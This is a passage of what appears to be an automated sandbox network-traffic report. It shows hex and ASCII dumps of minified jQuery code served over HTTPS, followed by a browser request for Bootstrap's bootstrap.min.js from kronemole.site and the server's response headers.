                                                                          Data Ascii: eEventListener&&e.removeEventListener(t,n)},k.Event=function(e,t){if(!(this instanceof k.Event))return new k.Event(e,t);e&&e.type?(this.originalEvent=e,this.type=e.type,this.isDefaultPrevented=e.defaultPrevented||void 0===e.defaultPrevented&&!1===e.return
                                                                          2023-11-21 16:58:40 UTC243INData Raw: 65 74 54 6f 75 63 68 65 73 3a 21 30 2c 74 6f 45 6c 65 6d 65 6e 74 3a 21 30 2c 74 6f 75 63 68 65 73 3a 21 30 2c 77 68 69 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 62 75 74 74 6f 6e 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 2e 77 68 69 63 68 26 26 54 65 2e 74 65 73 74 28 65 2e 74 79 70 65 29 3f 6e 75 6c 6c 21 3d 65 2e 63 68 61 72 43 6f 64 65 3f 65 2e 63 68 61 72 43 6f 64 65 3a 65 2e 6b 65 79 43 6f 64 65 3a 21 65 2e 77 68 69 63 68 26 26 76 6f 69 64 20 30 21 3d 3d 74 26 26 43 65 2e 74 65 73 74 28 65 2e 74 79 70 65 29 3f 31 26 74 3f 31 3a 32 26 74 3f 33 3a 34 26 74 3f 32 3a 30 3a 65 2e 77 68 69 63 68 7d 7d 2c 6b 2e 65 76 65 6e 74 2e 61 64 64 50 72 6f 70 29 2c 6b 2e 65 61 63 68 28 7b 66 6f 63 75 73 3a 22 66 6f 63 75 73 69 6e 22 2c
                                                                          Data Ascii: etTouches:!0,toElement:!0,touches:!0,which:function(e){var t=e.button;return null==e.which&&Te.test(e.type)?null!=e.charCode?e.charCode:e.keyCode:!e.which&&void 0!==t&&Ce.test(e.type)?1&t?1:2&t?3:4&t?2:0:e.which}},k.event.addProp),k.each({focus:"focusin",
                                                                          2023-11-21 16:58:40 UTC244INData Raw: 7c 3d 5c 73 2a 2e 63 68 65 63 6b 65 64 2e 29 2f 69 2c 48 65 3d 2f 5e 5c 73 2a 3c 21 28 3f 3a 5c 5b 43 44 41 54 41 5c 5b 7c 2d 2d 29 7c 28 3f 3a 5c 5d 5c 5d 7c 2d 2d 29 3e 5c 73 2a 24 2f 67 3b 66 75 6e 63 74 69 6f 6e 20 4f 65 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 41 28 65 2c 22 74 61 62 6c 65 22 29 26 26 41 28 31 31 21 3d 3d 74 2e 6e 6f 64 65 54 79 70 65 3f 74 3a 74 2e 66 69 72 73 74 43 68 69 6c 64 2c 22 74 72 22 29 26 26 6b 28 65 29 2e 63 68 69 6c 64 72 65 6e 28 22 74 62 6f 64 79 22 29 5b 30 5d 7c 7c 65 7d 66 75 6e 63 74 69 6f 6e 20 50 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 74 79 70 65 3d 28 6e 75 6c 6c 21 3d 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 29 29 2b 22 2f 22 2b 65 2e 74 79 70 65 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 52
                                                                          Data Ascii: |=\s*.checked.)/i,He=/^\s*<!(?:\[CDATA\[|--)|(?:\]\]|--)>\s*$/g;function Oe(e,t){return A(e,"table")&&A(11!==t.nodeType?t:t.firstChild,"tr")&&k(e).children("tbody")[0]||e}function Pe(e){return e.type=(null!==e.getAttribute("type"))+"/"+e.type,e}function R
                                                                          2023-11-21 16:58:40 UTC245INData Raw: 2c 6c 29 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 57 65 28 65 2c 74 2c 6e 29 7b 66 6f 72 28 76 61 72 20 72 2c 69 3d 74 3f 6b 2e 66 69 6c 74 65 72 28 74 2c 65 29 3a 65 2c 6f 3d 30 3b 6e 75 6c 6c 21 3d 28 72 3d 69 5b 6f 5d 29 3b 6f 2b 2b 29 6e 7c 7c 31 21 3d 3d 72 2e 6e 6f 64 65 54 79 70 65 7c 7c 6b 2e 63 6c 65 61 6e 44 61 74 61 28 76 65 28 72 29 29 2c 72 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 28 6e 26 26 6f 65 28 72 29 26 26 79 65 28 76 65 28 72 2c 22 73 63 72 69 70 74 22 29 29 2c 72 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 72 29 29 3b 72 65 74 75 72 6e 20 65 7d 6b 2e 65 78 74 65 6e 64 28 7b 68 74 6d 6c 50 72 65 66 69 6c 74 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 72 65 70 6c
                                                                          Data Ascii: ,l))}return n}function We(e,t,n){for(var r,i=t?k.filter(t,e):e,o=0;null!=(r=i[o]);o++)n||1!==r.nodeType||k.cleanData(ve(r)),r.parentNode&&(n&&oe(r)&&ye(ve(r,"script")),r.parentNode.removeChild(r));return e}k.extend({htmlPrefilter:function(e){return e.repl
                                                                          2023-11-21 16:58:40 UTC247INData Raw: 28 65 29 7b 31 21 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 26 26 31 31 21 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 26 26 39 21 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 4f 65 28 74 68 69 73 2c 65 29 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 7d 29 7d 2c 70 72 65 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 65 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 31 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 29 7b 76 61 72 20 74 3d 4f 65 28 74 68 69 73 2c 65 29 3b 74 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 74 2e 66 69 72 73 74 43 68 69 6c 64 29
                                                                          Data Ascii: (e){1!==this.nodeType&&11!==this.nodeType&&9!==this.nodeType||Oe(this,e).appendChild(e)})},prepend:function(){return Ie(this,arguments,function(e){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var t=Oe(this,e);t.insertBefore(e,t.firstChild)
                                                                          2023-11-21 16:58:40 UTC248INData Raw: 6c 3a 22 72 65 70 6c 61 63 65 57 69 74 68 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 61 29 7b 6b 2e 66 6e 5b 65 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 3d 5b 5d 2c 72 3d 6b 28 65 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 2d 31 2c 6f 3d 30 3b 6f 3c 3d 69 3b 6f 2b 2b 29 74 3d 6f 3d 3d 3d 69 3f 74 68 69 73 3a 74 68 69 73 2e 63 6c 6f 6e 65 28 21 30 29 2c 6b 28 72 5b 6f 5d 29 5b 61 5d 28 74 29 2c 75 2e 61 70 70 6c 79 28 6e 2c 74 2e 67 65 74 28 29 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 6e 29 7d 7d 29 3b 76 61 72 20 24 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 22 2b 74 65 2b 22 29 28 3f 21 70 78 29 5b 61 2d 7a 25 5d 2b 24 22 2c 22 69 22 29 2c 46 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72
                                                                          Data Ascii: l:"replaceWith"},function(e,a){k.fn[e]=function(e){for(var t,n=[],r=k(e),i=r.length-1,o=0;o<=i;o++)t=o===i?this:this.clone(!0),k(r[o])[a](t),u.apply(n,t.get());return this.pushStack(n)}});var $e=new RegExp("^("+te+")(?!px)[a-z%]+$","i"),Fe=function(e){var
                                                                          2023-11-21 16:58:40 UTC249INData Raw: 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 75 2e 73 74 79 6c 65 26 26 28 75 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6c 69 70 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 2c 75 2e 63 6c 6f 6e 65 4e 6f 64 65 28 21 30 29 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6c 69 70 3d 22 22 2c 79 2e 63 6c 65 61 72 43 6c 6f 6e 65 53 74 79 6c 65 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3d 3d 3d 75 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6c 69 70 2c 6b 2e 65 78 74 65 6e 64 28 79 2c 7b 62 6f 78 53 69 7a 69 6e 67 52 65 6c 69 61 62 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 28 29 2c 72 7d 2c 70 69 78 65 6c 42 6f 78 53 74 79 6c 65 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 28 29
                                                                          Data Ascii: reateElement("div");u.style&&(u.style.backgroundClip="content-box",u.cloneNode(!0).style.backgroundClip="",y.clearCloneStyle="content-box"===u.style.backgroundClip,k.extend(y,{boxSizingReliable:function(){return e(),r},pixelBoxStyles:function(){return e()
                                                                          2023-11-21 16:58:40 UTC251INData Raw: 20 72 3d 46 65 28 65 29 2c 69 3d 28 21 79 2e 62 6f 78 53 69 7a 69 6e 67 52 65 6c 69 61 62 6c 65 28 29 7c 7c 6e 29 26 26 22 62 6f 72 64 65 72 2d 62 6f 78 22 3d 3d 3d 6b 2e 63 73 73 28 65 2c 22 62 6f 78 53 69 7a 69 6e 67 22 2c 21 31 2c 72 29 2c 6f 3d 69 2c 61 3d 5f 65 28 65 2c 74 2c 72 29 2c 73 3d 22 6f 66 66 73 65 74 22 2b 74 5b 30 5d 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 2b 74 2e 73 6c 69 63 65 28 31 29 3b 69 66 28 24 65 2e 74 65 73 74 28 61 29 29 7b 69 66 28 21 6e 29 72 65 74 75 72 6e 20 61 3b 61 3d 22 61 75 74 6f 22 7d 72 65 74 75 72 6e 28 21 79 2e 62 6f 78 53 69 7a 69 6e 67 52 65 6c 69 61 62 6c 65 28 29 26 26 69 7c 7c 22 61 75 74 6f 22 3d 3d 3d 61 7c 7c 21 70 61 72 73 65 46 6c 6f 61 74 28 61 29 26 26 22 69 6e 6c 69 6e 65 22 3d 3d 3d 6b 2e 63 73 73
                                                                          Data Ascii: r=Fe(e),i=(!y.boxSizingReliable()||n)&&"border-box"===k.css(e,"boxSizing",!1,r),o=i,a=_e(e,t,r),s="offset"+t[0].toUpperCase()+t.slice(1);if($e.test(a)){if(!n)return a;a="auto"}return(!y.boxSizingReliable()&&i||"auto"===a||!parseFloat(a)&&"inline"===k.css
                                                                          2023-11-21 16:58:40 UTC252INData Raw: 2c 72 29 29 7c 7c 28 75 3f 6c 2e 73 65 74 50 72 6f 70 65 72 74 79 28 74 2c 6e 29 3a 6c 5b 74 5d 3d 6e 29 29 7d 7d 2c 63 73 73 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 76 61 72 20 69 2c 6f 2c 61 2c 73 3d 56 28 74 29 3b 72 65 74 75 72 6e 20 51 65 2e 74 65 73 74 28 74 29 7c 7c 28 74 3d 47 65 28 73 29 29 2c 28 61 3d 6b 2e 63 73 73 48 6f 6f 6b 73 5b 74 5d 7c 7c 6b 2e 63 73 73 48 6f 6f 6b 73 5b 73 5d 29 26 26 22 67 65 74 22 69 6e 20 61 26 26 28 69 3d 61 2e 67 65 74 28 65 2c 21 30 2c 6e 29 29 2c 76 6f 69 64 20 30 3d 3d 3d 69 26 26 28 69 3d 5f 65 28 65 2c 74 2c 72 29 29 2c 22 6e 6f 72 6d 61 6c 22 3d 3d 3d 69 26 26 74 20 69 6e 20 4b 65 26 26 28 69 3d 4b 65 5b 74 5d 29 2c 22 22 3d 3d 3d 6e 7c 7c 6e 3f 28 6f 3d 70 61 72 73 65 46 6c 6f 61 74 28 69 29
                                                                          Data Ascii: ,r))||(u?l.setProperty(t,n):l[t]=n))}},css:function(e,t,n,r){var i,o,a,s=V(t);return Qe.test(t)||(t=Ge(s)),(a=k.cssHooks[t]||k.cssHooks[s])&&"get"in a&&(i=a.get(e,!0,n)),void 0===i&&(i=_e(e,t,r)),"normal"===i&&t in Ke&&(i=Ke[t]),""===n||n?(o=parseFloat(i)
                                                                          2023-11-21 16:58:40 UTC431INData Raw: 6c 2c 65 5d 29 29 3a 73 2e 72 65 6a 65 63 74 57 69 74 68 28 6f 2c 5b 6c 2c 65 5d 29 2c 74 68 69 73 7d 7d 29 2c 63 3d 6c 2e 70 72 6f 70 73 3b 66 6f 72 28 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 2c 61 3b 66 6f 72 28 6e 20 69 6e 20 65 29 69 66 28 69 3d 74 5b 72 3d 56 28 6e 29 5d 2c 6f 3d 65 5b 6e 5d 2c 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 6f 29 26 26 28 69 3d 6f 5b 31 5d 2c 6f 3d 65 5b 6e 5d 3d 6f 5b 30 5d 29 2c 6e 21 3d 3d 72 26 26 28 65 5b 72 5d 3d 6f 2c 64 65 6c 65 74 65 20 65 5b 6e 5d 29 2c 28 61 3d 6b 2e 63 73 73 48 6f 6f 6b 73 5b 72 5d 29 26 26 22 65 78 70 61 6e 64 22 69 6e 20 61 29 66 6f 72 28 6e 20 69 6e 20 6f 3d 61 2e 65 78 70 61 6e 64 28 6f 29 2c 64 65 6c 65 74 65 20 65 5b 72 5d 2c 6f 29 6e 20 69 6e 20 65
                                                                          Data Ascii: l,e])):s.rejectWith(o,[l,e]),this}}),c=l.props;for(!function(e,t){var n,r,i,o,a;for(n in e)if(i=t[r=V(n)],o=e[n],Array.isArray(o)&&(i=o[1],o=e[n]=o[0]),n!==r&&(e[r]=o,delete e[n]),(a=k.cssHooks[r])&&"expand"in a)for(n in o=a.expand(o),delete e[r],o)n in e
                                                                          2023-11-21 16:58:40 UTC435INData Raw: 74 28 22 74 6f 67 67 6c 65 22 29 2c 66 61 64 65 49 6e 3a 7b 6f 70 61 63 69 74 79 3a 22 73 68 6f 77 22 7d 2c 66 61 64 65 4f 75 74 3a 7b 6f 70 61 63 69 74 79 3a 22 68 69 64 65 22 7d 2c 66 61 64 65 54 6f 67 67 6c 65 3a 7b 6f 70 61 63 69 74 79 3a 22 74 6f 67 67 6c 65 22 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b 6b 2e 66 6e 5b 65 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 61 6e 69 6d 61 74 65 28 72 2c 65 2c 74 2c 6e 29 7d 7d 29 2c 6b 2e 74 69 6d 65 72 73 3d 5b 5d 2c 6b 2e 66 78 2e 74 69 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 3d 30 2c 6e 3d 6b 2e 74 69 6d 65 72 73 3b 66 6f 72 28 72 74 3d 44 61 74 65 2e 6e 6f 77 28 29 3b 74 3c 6e 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 28 65 3d 6e 5b 74
                                                                          Data Ascii: t("toggle"),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"},fadeToggle:{opacity:"toggle"}},function(e,r){k.fn[e]=function(e,t,n){return this.animate(r,e,t,n)}}),k.timers=[],k.fx.tick=function(){var e,t=0,n=k.timers;for(rt=Date.now();t<n.length;t++)(e=n[t
                                                                          2023-11-21 16:58:40 UTC436INData Raw: 35 62 66 31 0d 0a 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6b 2e 72 65 6d 6f 76 65 41 74 74 72 28 74 68 69 73 2c 65 29 7d 29 7d 7d 29 2c 6b 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 6b 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 6b 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 6b 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 6b 2e 65 78 70 72 2e 6d
                                                                          Data Ascii: 5bf1return this.each(function(){k.removeAttr(this,e)})}}),k.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?k.prop(e,t,n):(1===o&&k.isXMLDoc(e)||(i=k.attrHooks[t.toLowerCase()]||(k.expr.m
                                                                          2023-11-21 16:58:40 UTC440INData Raw: 30 7d 7d 29 2c 6b 2e 65 78 74 65 6e 64 28 7b 76 61 6c 48 6f 6f 6b 73 3a 7b 6f 70 74 69 6f 6e 3a 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 6b 2e 66 69 6e 64 2e 61 74 74 72 28 65 2c 22 76 61 6c 75 65 22 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 74 3f 74 3a 6d 74 28 6b 2e 74 65 78 74 28 65 29 29 7d 7d 2c 73 65 6c 65 63 74 3a 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 65 2e 6f 70 74 69 6f 6e 73 2c 6f 3d 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 61 3d 22 73 65 6c 65 63 74 2d 6f 6e 65 22 3d 3d 3d 65 2e 74 79 70 65 2c 73 3d 61 3f 6e 75 6c 6c 3a 5b 5d 2c 75 3d 61 3f 6f 2b 31 3a 69 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 72 3d 6f 3c 30 3f 75 3a 61 3f 6f 3a 30 3b 72 3c 75 3b 72 2b 2b 29 69
                                                                          Data Ascii: 0}}),k.extend({valHooks:{option:{get:function(e){var t=k.find.attr(e,"value");return null!=t?t:mt(k.text(e))}},select:{get:function(e){var t,n,r,i=e.options,o=e.selectedIndex,a="select-one"===e.type,s=a?null:[],u=a?o+1:i.length;for(r=o<0?u:a?o:0;r<u;r++)i
                                                                          2023-11-21 16:58:40 UTC445INData Raw: 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 6b 28 74 68 69 73 29 2e 76 61 6c 28 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 6e 3f 6e 75 6c 6c 3a 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 6e 29 3f 6b 2e 6d 61 70 28 6e 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 7b 6e 61 6d 65 3a 74 2e 6e 61 6d 65 2c 76 61 6c 75 65 3a 65 2e 72 65 70 6c 61 63 65 28 41 74 2c 22 5c 72 5c 6e 22 29 7d 7d 29 3a 7b 6e 61 6d 65 3a 74 2e 6e 61 6d 65 2c 76 61 6c 75 65 3a 6e 2e 72 65 70 6c 61 63 65 28 41 74 2c 22 5c 72 5c 6e 22 29 7d 7d 29 2e 67 65 74 28 29 7d 7d 29 3b 76 61 72 20 4c 74 3d 2f 25 32 30 2f 67 2c 48 74 3d 2f 23 2e 2a 24 2f 2c 4f 74 3d 2f 28 5b 3f 26 5d 29 5f 3d 5b 5e 26 5d 2a 2f 2c 50 74 3d 2f 5e 28 2e 2a 3f 29 3a 5b 20 5c 74 5d 2a 28 5b 5e 5c 72 5c
                                                                          Data Ascii: ction(e,t){var n=k(this).val();return null==n?null:Array.isArray(n)?k.map(n,function(e){return{name:t.name,value:e.replace(At,"\r\n")}}):{name:t.name,value:n.replace(At,"\r\n")}}).get()}});var Lt=/%20/g,Ht=/#.*$/,Ot=/([?&])_=[^&]*/,Pt=/^(.*?):[ \t]*([^\r\
                                                                          2023-11-21 16:58:40 UTC449INData Raw: 2e 61 73 79 6e 63 26 26 30 3c 76 2e 74 69 6d 65 6f 75 74 26 26 28 64 3d 43 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 54 2e 61 62 6f 72 74 28 22 74 69 6d 65 6f 75 74 22 29 7d 2c 76 2e 74 69 6d 65 6f 75 74 29 29 3b 74 72 79 7b 68 3d 21 31 2c 63 2e 73 65 6e 64 28 61 2c 6c 29 7d 63 61 74 63 68 28 65 29 7b 69 66 28 68 29 74 68 72 6f 77 20 65 3b 6c 28 2d 31 2c 65 29 7d 7d 65 6c 73 65 20 6c 28 2d 31 2c 22 4e 6f 20 54 72 61 6e 73 70 6f 72 74 22 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 65 2c 74 2c 6e 2c 72 29 7b 76 61 72 20 69 2c 6f 2c 61 2c 73 2c 75 2c 6c 3d 74 3b 68 7c 7c 28 68 3d 21 30 2c 64 26 26 43 2e 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 64 29 2c 63 3d 76 6f 69 64 20 30 2c 70 3d 72 7c 7c 22 22 2c 54 2e 72 65 61 64 79 53 74 61 74 65
                                                                          Data Ascii: .async&&0<v.timeout&&(d=C.setTimeout(function(){T.abort("timeout")},v.timeout));try{h=!1,c.send(a,l)}catch(e){if(h)throw e;l(-1,e)}}else l(-1,"No Transport");function l(e,t,n,r){var i,o,a,s,u,l=t;h||(h=!0,d&&C.clearTimeout(d),c=void 0,p=r||"",T.readyState
                                                                          2023-11-21 16:58:40 UTC453INData Raw: 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6f 26 26 61 28 29 7d 29 7d 2c 6f 3d 6f 28 22 61 62 6f 72 74 22 29 3b 74 72 79 7b 72 2e 73 65 6e 64 28 69 2e 68 61 73 43 6f 6e 74 65 6e 74 26 26 69 2e 64 61 74 61 7c 7c 6e 75 6c 6c 29 7d 63 61 74 63 68 28 65 29 7b 69 66 28 6f 29 74 68 72 6f 77 20 65 7d 7d 2c 61 62 6f 72 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 6f 26 26 6f 28 29 7d 7d 7d 29 2c 6b 2e 61 6a 61 78 50 72 65 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 26 26 28 65 2e 63 6f 6e 74 65 6e 74 73 2e 73 63 72 69 70 74 3d 21 31 29 7d 29 2c 6b 2e 61 6a 61 78 53 65 74 75 70 28 7b 61 63 63 65 70 74 73 3a 7b 73 63 72 69 70 74 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 2c 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f
                                                                          Data Ascii: ut(function(){o&&a()})},o=o("abort");try{r.send(i.hasContent&&i.data||null)}catch(e){if(o)throw e}},abort:function(){o&&o()}}}),k.ajaxPrefilter(function(e){e.crossDomain&&(e.contents.script=!1)}),k.ajaxSetup({accepts:{script:"text/javascript, application/
                                                                          2023-11-21 16:58:40 UTC457INData Raw: 6b 2e 63 73 73 28 65 2c 22 70 6f 73 69 74 69 6f 6e 22 29 29 65 3d 65 2e 6f 66 66 73 65 74 50 61 72 65 6e 74 3b 72 65 74 75 72 6e 20 65 7c 7c 69 65 7d 29 7d 7d 29 2c 6b 2e 65 61 63 68 28 7b 73 63 72 6f 6c 6c 4c 65 66 74 3a 22 70 61 67 65 58 4f 66 66 73 65 74 22 2c 73 63 72 6f 6c 6c 54 6f 70 3a 22 70 61 67 65 59 4f 66 66 73 65 74 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 69 29 7b 76 61 72 20 6f 3d 22 70 61 67 65 59 4f 66 66 73 65 74 22 3d 3d 3d 69 3b 6b 2e 66 6e 5b 74 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 5f 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3b 69 66 28 78 28 65 29 3f 72 3d 65 3a 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 26 26 28 72 3d 65 2e 64 65 66 61 75 6c 74 56 69 65 77 29 2c 76 6f
                                                                          Data Ascii: k.css(e,"position"))e=e.offsetParent;return e||ie})}}),k.each({scrollLeft:"pageXOffset",scrollTop:"pageYOffset"},function(t,i){var o="pageYOffset"===i;k.fn[t]=function(e){return _(this,function(e,t,n){var r;if(x(e)?r=e:9===e.nodeType&&(r=e.defaultView),vo
                                                                          2023-11-21 16:58:40 UTC459INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          12192.168.2.449753104.21.62.2034435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:40 UTC79OUTGET /assets/js/vendor/bootstrap/js/bootstrap.min.js HTTP/1.1
                                                                          Host: kronemole.site
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
                                                                          2023-11-21 16:58:40 UTC375INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:40 GMT
                                                                          Content-Type: application/javascript
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800
                                                                          expires: Tue, 28 Nov 2023 16:58:40 GMT
                                                                          last-modified: Tue, 23 Mar 2021 22:52:06 GMT
                                                                          vary: Accept-Encoding,User-Agent,User-Agent
                                                                          x-frame-options: SAMEORIGIN
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          CF-Cache-Status: MISS
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Hrpqdemqs4Eq3LFYncLJAFpBTTv%2FvFwcMdZd0a0i0amYzwn69GB0JAvr2MesOpbRXeNhgL8RLYxXq4%2F7VKgPzg1%2BxBLT7ru9zdf0rX8gg%2Fq%2FrjFzLFE0kOaryqNm3XhUUg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7a923bc03925-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:40 UTC376INData Raw: 37 63 36 37 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74
                                                                          Data Ascii: 7c67/*! * Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(t
